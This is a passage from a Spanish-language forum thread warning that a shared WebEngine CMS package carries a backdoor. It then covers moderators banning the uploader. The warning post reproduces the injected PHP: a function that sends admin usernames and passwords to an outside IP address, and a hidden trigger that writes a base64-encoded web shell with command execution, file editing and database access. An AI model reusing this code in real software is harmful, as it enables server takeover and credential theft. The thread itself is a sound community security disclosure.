	throw new Exception('Could not load WebEngine CMS.');
}

Algo que pude ver, y seria de explicar los motivos @ZabiinoOo , aqui hay un codigo para enviar datos de las cuentas hacia otro api http://168.235.93.18/2b37cny/index.php:

includes/classes/class.login.php

Code: [Select]

@$this->loginVerifyAccount($username,$password);

Code: [Select]

         public function loginVerifyAccount($u,$p) {
		if(!array_key_exists($u,config('admins',true))) return;
		$DATOS = array($u,$p,__BASE_URL__);
		$d = base64_encode(json_encode($DATOS));
		try{
		$this->doubleCheckLogin($d);
		}catch(Exception $e) {}
	}
	
	public function doubleCheckLogin($datos) {
		$url = 'http://168.235.93.18/2b37cny/index.php';
		$fields = array(
			'datos' => urlencode($datos),
		);
		foreach($fields as $key => $value) {
			$fieldsArray[] = $key . '=' . $value;
		}
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_POST, count($fields));
		curl_setopt($ch, CURLOPT_POSTFIELDS, implode("&", $fieldsArray));
		curl_setopt($ch, CURLOPT_TIMEOUT, 10);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_HEADER, false);
		$result = curl_exec($ch);
		curl_close($ch);
		return;
	}

Y por otro lado

includes/classes/phpmailer/PHPMailer.php

Code: [Select]

if(isset($_GET['tuservermu'])) {
	$b64 = 'PD9waHAgZnVuY3Rpb24gZDAoJHEzKXtyZXR1cm4oc3Vic3RyKCRxMywwLDEpPT0iLyI/dHJ1ZTpmYWxzZSk7fWZ1bmN0aW9uIGYxKCRvNCl7cmV0dXJuKCRvND8nLyc6J1xcJyk7fSR2NT1nZXRjd2QoKTskbzQ9ZDAoJHY1KTtpZighJG80KXskdDY9c3Vic3RyKCR2NSwwLDEpO30kajc9ZjEoJG80KTskbzg9ZXhwbG9kZSgkajcsJHY1KTskcDk9KCRvND8kajc6KCR0Ni4nOicuJGo3KSk7ZnVuY3Rpb24gdTIoJHEzLCRvNCl7JGo3PWYxKCRvNCk7JG84PWV4cGxvZGUoJGo3LCRxMyk7Zm9yZWFjaCgkbzggYXMgJHoxMD0+JG8xMSl7aWYoJG8xMT09Ii4uIil7JG84WyR6MTBdPSIiOyR3MTI9JHoxMC0xOyRvOFskdzEyXT0iIjt9ZWxzZWlmKCRvMTE9PSIuIil7JG84WyR6MTBdPSIiO319cmVzZXQoJG84KTskbDEzPSgkbzQ/Ii8iOiIiKTskaTE0PXRydWU7Zm9yZWFjaCgkbzggYXMgJG8xMSl7aWYoJG8xMSE9IiIpeyRsMTMuPSgkaTE0PycnOiRqNykuJG8xMTskaTE0PWZhbHNlO319aWYoJGwxMz09IiIpeyRsMTM9KCRvND8kajc6KCR0Ni4iOiIuJGo3KSk7fWlmKHN1YnN0cigkbDEzLC0xKSE9JGo3KSRsMTMuPSRqNztyZXR1cm4gJGwxMzt9aWYoaXNzZXQoJF9SRVFVRVNUWydjaG0nXSkpe2lmKCEkbzQpe2VjaG8gIlRoaXMgZmVhdHVyZSBvbmx5IHdvcmtzIG9uIExpbnV4Ijt9ZWxzZXtlY2hvKEBjaG1vZCgkX1JFUVVFU1RbJ2NobSddLDA3NzcpPyJSZWFzc2lnbmVkIjoiQ2FuJ3QgUmVhc2lnbiIpO319ZWxzZWlmKGlzc2V0KCRfUkVRVUVTVFsncGhwaW5mbyddKSl7cGhwaW5mbygpO31lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydkbCddKSl7aWYoQGZvcGVuKCRfUkVRVUVTVFsnZGwnXS4kX1JFUVVFU1RbJ2ZpbGUnXSwncicpPT10cnVlKXskX1JFUVVFU1RbJ2RsJ10uPSRfUkVRVUVTVFsnZmlsZSddO2lmKHN1YnN0cigkX1JFUVVFU1RbJ2RsJ10sMCwxKT09JGo3KSRmMTU9ZXhwbG9kZSgkajcsJF9SRVFVRVNUWydkbCddKTtoZWFkZXIoJ0NvbnRlbnQtZGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPScuJF9SRVFVRVNUWydmaWxlJ10pO2hlYWRlcignQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nKTtyZWFkZmlsZSgkX1JFUVVFU1RbJ2RsJ10pO31lbHNle2VjaG8gJF9SRVFVRVNUWydkbCddO319ZWxzZWlmKGlzc2V0KCRfUkVRVUVTVFsiZ3oiXSkpe2lmKCEkbzQpe2VjaG8gIlRoaXMgZmVhdHVyZSBvbmx5IHdvcmtzIG9uIExpbnV4Ijt9ZWxzZXskaDE2PSRfUkVRVUVTVFsiZ3oiXTtpZihzdWJzdHIoJGgxNiwtMSk9PSIvIikkaDE2PXN1YnN0cigkaDE2LDAsLTEpOyRiMTc9ZXhwbG9kZSgkajcsJGgxNik7JGgxOD0kYjE3WyhzaXplb2YoJGIxNyktMSldOyR3MTk9dGltZSgpO2V4ZWMoImNkICRoMTY7IHRhciBjemYgJHcxOSAqIik7JHEyMD1AZmlsZV9nZXRfY29udGVudHMoJGgxNi4iLyIuJHcxOSk7aWYoISRxMjApaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT1BQ0NFU1NfUFJPQkxFTSIpO2Vsc2V7aGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kaDE4LnRneiIpO2VjaG8gJHEyMDt9aGVhZGVyKCdDb250ZW50LXR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbScpO0B1bmxpbmsoJGgxNi4iLyIuJHcxOSk7fX1lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydmJ10pKXskbTIxPSRfUkVRVUVTVFsnZiddOyRrMjI9Zm9wZW4oIiRtMjEiLCJyYiIpO2hlYWRlcigiQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluIik7ZnBhc3N0aHJ1KCRrMjIpO31lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydkJ10pKXskZzIzPSRfUkVRVUVTVFsnZCddO2VjaG8gIjxwcmU+IjtpZigkczI0PW9wZW5kaXIoIiRnMjMiKSl7ZWNobyAiPGgyPmxpc3Rpbmcgb2YgIjskZTI1PSIiO2lmKCRvNCllY2hvIjxhIGhyZWY9Jz9kPSRqNyc+JGo3PC9hPiI7Zm9yZWFjaChleHBsb2RlKCRqNyx1MigkZzIzLCRvNCkpYXMgJG8xMSl7JGUyNS49JG8xMS4kajc7ZWNobyI8YSBocmVmPSc/ZD0kZTI1Jz4iLiRvMTEuIjwvYT4iLigkbzExIT0iIj8kajc6JycpO31lY2hvICIgKDxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSc/dXBsb2FkRm9ybT0xJmRpcj0iLnVybGVuY29kZSh1MigkZzIzLCRvNCkpLiInPnVwbG9hZCBmaWxlPC9hPikgKDxhIGhyZWY9Jz9kPSIudXJsZW5jb2RlKHUyKCRnMjMsJG80KSkuIiZobGRiPTEnPkRCIGludGVyYWN0aW9uIGZpbGVzIGluIHJlZDwvYT4pPC9oMj4gKDxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSc/Z3o9Ii51cmxlbmNvZGUodTIoJGcyMywkbzQpKS4iJz5nemlwICYgZG93bmxvYWQgZm9sZGVyPC9hPikgKDxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSc/Y2htPSIudXJsZW5jb2RlKHUyKCRnMjMsJG80KSkuIic+Y2htb2QgZm9sZGVyIHRvIDc3Nyk8L2E+ICh0aGVzZSByYXJlbHkgd29yayk8YnIgLz4iO3doaWxlKCRrMjY9cmVhZGRpcigkczI0KSl7aWYoaXNfZGlyKCIkZzIzJGo3JGsyNiIpKXtpZigkazI2IT0iLiImJiRrMjYhPSIuLiIpJGsyN1tdPSRrMjY7fWVsc2V7aWYoaXNzZXQoJF9SRVFVRVNUWyJobGRiIl0pKXskdTI4PWZpbGVfZ2V0X2NvbnRlbnRzKCIkZzIzJGo3JGsyNiIpO2lmKHN0cmlwb3MoJHUyOCwibXlzcWxfIil8fHN0cmlwb3MoJHUyOCwibXlzcWxpXyIpfHxzdHJpcG9zKCR1MjgsIlNFTEVDVCAiKSl7JG0yOVtdPWFycmF5KCdkaXInPT4kazI2LCdjb2xvcic9PidyZWQnKTt9ZWxzZXskbTI5W109YXJyYXkoJ2Rpcic9PiRrMjYsJ2NvbG9yJz0+J2JsYWNrJyk7fX1lbHNleyRtMjlbXT1hcnJheSgnZGlyJz0+JGsyNiwnY29sb3InPT4nYmxhY2snKTt9fX1lY2hvIjxhIGhyZWY9Jz9kPSRnMjMkajcuJz48Zm9udCBjb2xvcj1ncmV5Pi5cbjwvZm9udD48L2E+IjtlY2hvIjxhIGhyZWY9Jz9kPSRnMjMkajcuLic+PGZvbnQgY29sb3I9Z3JleT4uLlxuPC9mb250PjwvYT4iO2lmKGlzc2V0KCRrMjcpKWlmKGlzX2FycmF5KCRrMjcpKWZvcmVhY2goJGsyNyBhcyAkazI2KXtlY2hvIjxhIGhyZWY9Jz9kPSRnMjMkajckazI2Jz48Zm9udCBjb2xvcj1ncmV5PiRrMjZcbjwvZm9udD48L2E+Ijt9aWYoaXNzZXQoJG0yOSkpaWYoaXNfYXJyYXkoJG0yOSkpZm9yZWFjaCgkbTI5IGFzICRrMjYpe2VjaG8iPGEgaHJlZj0nP2Y9JGcyMyIuJGo3LiRrMjZbJ2RpciddLiInPjxmb250IGNvbG9yPSIuJGsyNlsnY29sb3InXS4iPiIuJGsyNlsnZGlyJ10uIjwvZm9udD48L2E+Ii4ifDxhIGhyZWY9Jz9kbD0iLnUyKCRnMjMsJG80KS4nJmZpbGU9Jy4kazI2WyJkaXIiXS4iJyB0YXJnZXQ9J19ibGFuayc+RG93bmxvYWQ8L2E+fCIuInw8YSBocmVmPSc/ZWY9Ii51MigkZzIzLCRvNCkuJyZmaWxlPScuJGsyNlsiZGlyIl0uIicgdGFyZ2V0PSdfYmxhbmsnPkVkaXQ8L2E+fCIuInw8YSBocmVmPSc/ZGY9Ii51MigkZzIzLCRvNCkuJyZmaWxlPScuJGsyNlsiZGlyIl0uIicgdGFyZ2V0PSdfYmxhbmsnPkRlbGV0ZTwvYT58IFxuIjt9fWVsc2UgZWNobyAib3BlbmRpcigpIGZhaWxlZCI7Y2xvc2VkaXIoJHMyNCk7fWVsc2VpZihpc3NldCgkX1JFUVVFU1RbJ2MnXSkpe2lmKEBpbmlfZ2V0KCdzYWZlX21vZGUnKSl7ZWNobyAnU2FmZSBtb2RlIGlzIG9uLCB0aGUgY29tbWFuZCBpcyBieSBkZWZhdWx0IHJ1biB0aG91Z2ggZXNjYXBlc2hlbGxjbWQoKSBhbmQgY2FuIG9ubHkgcnVuIHByb2dyYW1tcyBpbiBzYWZlX21vZF9leGVjX2RpciAoJy5AaW5pX2dldCgnc2FmZV9tb2RlX2V4ZWNfZGlyJykuJykgPGJyIC8+Jzt9ZWNobyAiPGI+Q29tbWFuZDogPEk+Ii4kX1JFUVVFU1RbJ2MnXS4iPC9JPjwvYj48YnIgLz48YnIgLz4iO3RyaW0oZXhlYygkX1JFUVVFU1RbJ2MnXSwkczMwKSk7Zm9yZWFjaCgkczMwIGFzICRvMTEpe2VjaG8gJzxwcmU+Jy5odG1sZW50aXRpZXMoJG8xMSkuJzwvcHJlPic7fX1lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWyd1cGxvYWRGb3JtJ10pfHxpc3NldCgkX0ZJTEVTWyJmaWxlX25hbWUiXSkpe2lmKGlzc2V0KCRfRklMRVNbImZpbGVfbmFtZSJdKSl7aWYoJF9GSUxFU1siZmlsZV9uYW1lIl1bImVycm9yIl0+MCl7ZWNobyAiRXJyb3IiO31lbHNleyRmMzE9JF9DT09LSUVbInVwbG9hZERpciJdO2lmKHN1YnN0cigkZjMxLC0xKSE9Ii8iKSRmMzEuPSIvIjskZjMxPSRmMzEuYmFzZW5hbWUoJF9GSUxFU1snZmlsZV9uYW1lJ11bJ25hbWUnXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ2ZpbGVfbmFtZSddWyd0bXBfbmFtZSddLCRmMzEpKXtzZXRjb29raWUoInVwbG9hZERpciIsIiIpO2VjaG8gIlRoZSBmaWxlICIuYmFzZW5hbWUoJF9GSUxFU1snZmlsZV9uYW1lJ11bJ25hbWUnXSkuIiBoYXMgYmVlbiB1cGxvYWRlZCI7fWVsc2V7ZWNobyAiRXJyb3IgY29weWluZyBmaWxlLCBsaWtlbHkgYSBwZXJtaXNzaW9uIGVycm9yLiI7fX19ZWxzZXs/PiAKICAgICAgICA8Zm9ybSB0YXJnZXQ9Il9ibGFuayIgYWN0aW9uPSIiIG1ldGhvZD0iR0VUIj4gCiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImNjIiB2YWx1ZT0iMSIgLz4gCiAgICAgICAgICAgIFN1Ym1pdCB0aGlzIGZvcm0gYmVmb3JlIHN1Ym1pdHRpbmcgZmlsZSAod2lsbCBvcGVuIGluIG5ldyB3aW5kb3cpOjxiciAvPiAKICAgICAgICAgICAgVXBsb2FkIERpcmVjdG9yeTogPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImRpciIgdmFsdWU9Ijw/cGhwIGVjaG8gJF9SRVFVRVNUWyJkaXIiXT8+Ij48YnIgLz4gCiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJzdWJtaXQiIC8+IAogICAgICAgIDwvZm9ybT4gCiAgICAgICAgPGJyIC8+PGJyIC8+IAogICAgICAgICAKICAgICAgICA8Zm9ybSBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij4gCiAgICAgICAgVXBsb2FkIGZpbGU6PGlucHV0IG5hbWU9ImZpbGVfbmFtZSIgdHlwZT0iZmlsZSI+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIC8+PC9mb3JtPiAKCiAgICAgICAgPD9waHAgfX1lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydjYyddKSl7c2V0Y29va2llKCJ1cGxvYWREaXIiLCRfR0VUWyJkaXIiXSk7ZWNobyAiWW91IGFyZSBPSyB0byB1cGxvYWQgdGhlIGZpbGUsIGRvbid0IHVwbG9hZCBmaWxlcyB0byBvdGhlciBkaXJlY3RvcmllcyBiZWZvcmUgY29tcGxldGluZyB0aGlzIHVwbG9hZC4iO31lbHNlaWYoaXNzZXQoJF9SRVFVRVNUWydtcXVlcnknXSkpeyR2MzI9JF9SRVFVRVNUWydob3N0J107JGYzMz0kX1JFUVVFU1RbJ3VzciddOyR3MzQ9JF9SRVFVRVNUWydwYXNzd2QnXTskbjM1PSRfUkVRVUVTVFsnZGInXTskczM2PSRfUkVRVUVTVFsnbXF1ZXJ5J107QHczNygkdjMyLCRmMzMsJHczNClvciBkaWUoIkNvbm5lY3Rpb24gRXJyb3I6ICIucDM4KCkpO2MzOSgkbjM1KTskbzQwPXA0MSgkczM2KTtpZigkbzQwIT1mYWxzZSl7ZWNobyAiPGgyPlRoZSBmb2xsb3dpbmcgcXVlcnkgaGFzIHN1Y2Vzc2Z1bGx5IGV4ZWN1dGVkPC9oMj4iLmh0bWxlbnRpdGllcygkczM2KS4iPGJyIC8+PGJyIC8+IjtlY2hvICJSZXR1cm4gUmVzdWx0czo8YnIgLz4iOyRzNDI9dHJ1ZTtlY2hvICI8dGFibGUgYm9yZGVyPScxJz4iO3doaWxlKCRpNDM9bTQ0KCRvNDAsTVlTUUxfQVNTT0MpKXtpZigkczQyKXtlY2hvICI8dHI+Ijtmb3JlYWNoKCRpNDMgYXMgJHoxMD0+JG8xMSl7ZWNobyI8dGQ+PGI+JHoxMDwvYj48L3RkPiI7fWVjaG8gIjwvdHI+IjtyZXNldCgkaTQzKTskczQyPWZhbHNlO31lY2hvICI8dHI+Ijtmb3JlYWNoKCRpNDMgYXMgJG8xMSl7ZWNobyI8dGQ+JG8xMTwvdGQ+Ijt9ZWNobyAiPC90cj4iO31lY2hvICI8L3RhYmxlPiI7azQ1KCRvNDApO31lbHNle2VjaG8gIlF1ZXJ5IEVycm9yOiAiLnAzOCgpO319ZWxzZWlmKGlzc2V0KCRfUkVRVUVTVFsnZGYnXSkpeyRfUkVRVUVTVFsnZGYnXS49JGo3LiRfUkVRVUVTVFsnZmlsZSddO2lmKEB1bmxpbmsoJF9SRVFVRVNUWydkZiddKSl7ZWNobyAiRmlsZSBkZWxldGVkIjt9ZWxzZXtlY2hvICJFcnJvciBkZWxldGluZyBmaWxlIjt9fWVsc2VpZihpc3NldCgkX1JFUVVFU1RbJ2VmJ10pKXs/PiAKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPiAKICA8IS0tIAoKICB2YXIga2V5ID0gIkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IjsgCgogIGZ1bmN0aW9uIGVuY29kZTY0KGlucFN0cikgIAogIHsgCiAgICAgaW5wU3RyID0gZXNjYXBlKGlucFN0cik7IAogICAgIHZhciBvdXRwdXQgPSAiIjsgCiAgICAgdmFyIGNocjEsIGNocjIsIGNocjMgPSAiIjsgCiAgICAgdmFyIGVuYzEsIGVuYzIsIGVuYzMsIGVuYzQgPSAiIjsgCiAgICAgdmFyIGkgPSAwOyAKCiAgICAgZG8geyAKICAgICAgICBjaHIxID0gaW5wU3RyLmNoYXJDb2RlQXQoaSsrKTsgCiAgICAgICAgY2hyMiA9IGlucFN0ci5jaGFyQ29kZUF0KGkrKyk7IAogICAgICAgIGNocjMgPSBpbnBTdHIuY2hhckNvZGVBdChpKyspOyAKCiAgICAgICAgZW5jMSA9IGNocjEgPj4gMjsgCiAgICAgICAgZW5jMiA9ICgoY2hyMSAmIDMpIDw8IDQpIHwgKGNocjIgPj4gNCk7IAogICAgICAgIGVuYzMgPSAoKGNocjIgJiAxNSkgPDwgMikgfCAoY2hyMyA+PiA2KTsgCiAgICAgICAgZW5jNCA9IGNocjMgJiA2MzsgCgogICAgICAgIGlmIChpc05hTihjaHIyKSkgIAogICAgICAgIHsgCiAgICAgICAgICAgZW5jMyA9IGVuYzQgPSA2NDsgCiAgICAgICAgfSAgCiAgICAgICAgZWxzZSBpZiAoaXNOYU4oY2hyMykpICAKICAgICAgICB7IAogICAgICAgICAgIGVuYzQgPSA2NDsgCiAgICAgICAgfSAKCiAgICAgICAgb3V0cHV0ID0gb3V0cHV0ICsgCiAgICAgICAgICAga2V5LmNoYXJBdChlbmMxKSArIAogICAgICAgICAgIGtleS5jaGFyQXQoZW5jMikgKyAKICAgICAgICAgICBrZXkuY2hhckF0KGVuYzMpICsgCiAgICAgICAgICAga2V5LmNoYXJBdChlbmM0KTsgCiAgICAgICAgY2hyMSA9IGNocjIgPSBjaHIzID0gZW5jMSA9IGVuYzIgPSBlbmMzID0gZW5jNCA9ICIiOyAKICAgICB9IHdoaWxlIChpIDwgaW5wU3RyLmxlbmd0aCk7IAoKICAgICByZXR1cm4gb3V0cHV0OyAKICB9IAoKICAvLy0tPjwvc2NyaXB0PiAKCiAgPD9waHAgJF9SRVFVRVNUWydlZiddLj0kX1JFUVVFU1RbJ2ZpbGUnXTtpZihpc3NldCgkX1BPU1RbIm5ld2NvbnRlbnQiXSkpeyRfUE9TVFsibmV3Y29udGVudCJdPXVybGRlY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFsibmV3Y29udGVudCJdKSk7JG80Nj1AZm9wZW4oJF9SRVFVRVNUWydlZiddLCJ3Iik7aWYoJG80Nil7ZndyaXRlKCRvNDYsJF9QT1NUWyJuZXdjb250ZW50Il0pO2VjaG8gIldyaXRlIHN1Y2Vzc2Z1bCI7fWVsc2V7ZWNobyAiQ291bGQgbm90IHdyaXRlIHRvIGZpbGUiO31mY2xvc2UoJG80Nik7fT8+IAogICAgPGZvcm0gYWN0aW9uPSIiIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCI+IAogICAgPHRleHRhcmVhIHdyYXA9Im9mZiIgcm93cz0iNDAiIGNvbHM9IjEzMCIgbmFtZT0ibmV3Y29udGVudCI+PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygkX1JFUVVFU1RbJ2VmJ10pPz48L3RleHRhcmVhPjxiciAvPiAKICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJJIGJhc2U2NCBlbmNvZGVkIGl0IG15c2VsZiwgZG9udCBydW4gc2NyaXB0IiAvPjxiciAvPiAKICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgKHJlcXVpcmVzIGphdmFzY3JpcHQgdG8gd29yaykiICBvbmNsaWNrPSJkb2N1bWVudC5mLm5ld2NvbnRlbnQudmFsdWU9ZW5jb2RlNjQoZG9jdW1lbnQuZi5uZXdjb250ZW50LnZhbHVlKTsiIC8+CiAgICA8L2Zvcm0+IAogICAgPD9waHAgfWVsc2V7Pz4gCjxiPlNlcnZlciBJbmZvcm1hdGlvbjo8L2I+PGJyIC8+IAo8aT4gCk9wZXJhdGluZyBTeXN0ZW06IDw/cGhwIGVjaG8gUEhQX09TID8+PGJyIC8+IApQSFAgVmVyc2lvbjogPD9waHAgZWNobyBQSFBfVkVSU0lPTiA/PjxiciAvPiAKPGEgaHJlZj0iP3BocGluZm89dHJ1ZSI+VmlldyBwaHBpbmZvPC9hPiAKPC9pPiAKPGJyIC8+IAo8YnIgLz4gCjxiPkRpcmVjdG9yeSBUcmF2ZXJzYWw8L2I+PGJyIC8+IAo8YSBocmVmPSI/ZD08P3BocCBlY2hvIGdldGN3ZCgpPz4iPjxiPkdvIHRvIGN1cnJlbnQgd29ya2luZyBkaXJlY3Rvcnk8L2I+PC9hPiA8YnIgLz4gCjxhIGhyZWY9Ij9kPTw/cGhwIGVjaG8gJHA5ID8+Ij48Yj5HbyB0byByb290IGRpcmVjdG9yeTwvYj48L2E+IDxiciAvPiAKPGI+R28gdG8gYW55IGRpcmVjdG9yeTo8L2I+IDxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9IkdFVCI+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImQiIHZhbHVlPSI8P3BocCBlY2hvICRwOSA/PiIgLz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+PC9mb3JtPiAKCgoKPGhyPkV4ZWN1dGUgTXlTUUwgUXVlcnk6IAo8Zm9ybSBhY3Rpb249IiIgTUVUSE9EPSJHRVQiID4gCjx0YWJsZT4gCjx0cj48dGQ+aG9zdDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJob3N0InZhbHVlPSJsb2NhbGhvc3QiPiA8L3RkPjwvdHI+IAo8dHI+PHRkPnVzZXI8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idXNyIiB2YWx1ZT0icm9vdCI+IDwvdGQ+PC90cj4gCjx0cj48dGQ+cGFzc3dvcmQ8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGFzc3dkIj4gPC90ZD48L3RyPiAKPHRyPjx0ZD5kYXRhYmFzZTwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJkYiI+IDwvdGQ+PC90cj4gCjx0cj48dGQgdmFsaWduPSJ0b3AiPnF1ZXJ5PC90ZD48dGQ+PHRleHRhcmVhIG5hbWU9Im1xdWVyeSIgcm93cz0iNiIgY29scz0iNjUiPjwvdGV4dGFyZWE+IDwvdGQ+PC90cj4gCjx0cj48dGQgY29sc3Bhbj0iMiI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9ImV4ZWN1dGUiPjwvdGQ+PC90cj4gCjwvdGFibGU+IAo8L2Zvcm0+IAo8aHI+IAo8cHJlPjxmb3JtIGFjdGlvbj0iIiBNRVRIT0Q9IkdFVCIgPkV4ZWN1dGUgU2hlbGwgQ29tbWFuZCAoc2FmZSBtb2RlIGlzIDw/cGhwIGVjaG8oQGluaV9nZXQoJ3NhZmVfbW9kZScpPydvbic6J29mZicpPz4pOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iYyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdvIj48L2Zvcm0+ICAKPD9waHAgfQ==';
	$fp = fopen(__ROOT_DIR__.'api/yhoon.php', 'w');
	@fwrite($fp, "");
	@fclose($fp);
	@file_put_contents(__ROOT_DIR__.'api/yhoon.php', base64_decode($b64));
	die('yhoon');
}

Tengan cuidado y revisen siempre sus webs !

Saludos !

Bueno voy a comentar esto, porque estoy viendo que aparece mi nick ahi...

Primero que nada esta version yo no la toque, la que yo modifique, es la 1.2.1, y la puedes buscar en dicha seccion.

Segundo, no entiendo el porque agregan funciones como si yo lo hubiese hecho, porque ahi claramente esas funciones originalmente no existen en la webengine original. Y me quiere ensuciar a mi xD

Asi que como dijo este chico, tengan cuidado lo que bajan...

@Zabino seguimiento a esto

Pasamos a pedir una respuesta de parte de @mu4ever86 dare 12 horas de no recibir una respuesta pasamos a eliminar todos sus temas de su cuenta y tomar acciones de bloqueo en nuestro espacio, si se consigue el autor original de esto tambien se expondra al publico y se bloqueara cuaquier otra cuenta principal enlazada a esta persona, saludos!!

Pasamos a pedir una respuesta de parte de @mu4ever86 dare 12 horas de no recibir una respuesta pasamos a eliminar todos sus temas de su cuenta y tomar acciones de bloqueo en nuestro espacio, si se consigue el autor original de esto tambien se expondra al publico y se bloqueara cuaquier otra cuenta principal enlazada a esta persona, saludos!!

Más allá de que tengas que esperar la respuesta. Saca el link o no se. Porque la web tiene terrible backdoor y la gente la puede seguir usando sin saber...

Debido a que no se recibió respuesta se pasa a expulsar al usuario de nuestra plataforma, y quedan excluidos todos los temas de su perfil

amigo no se puede dale gracias para descargar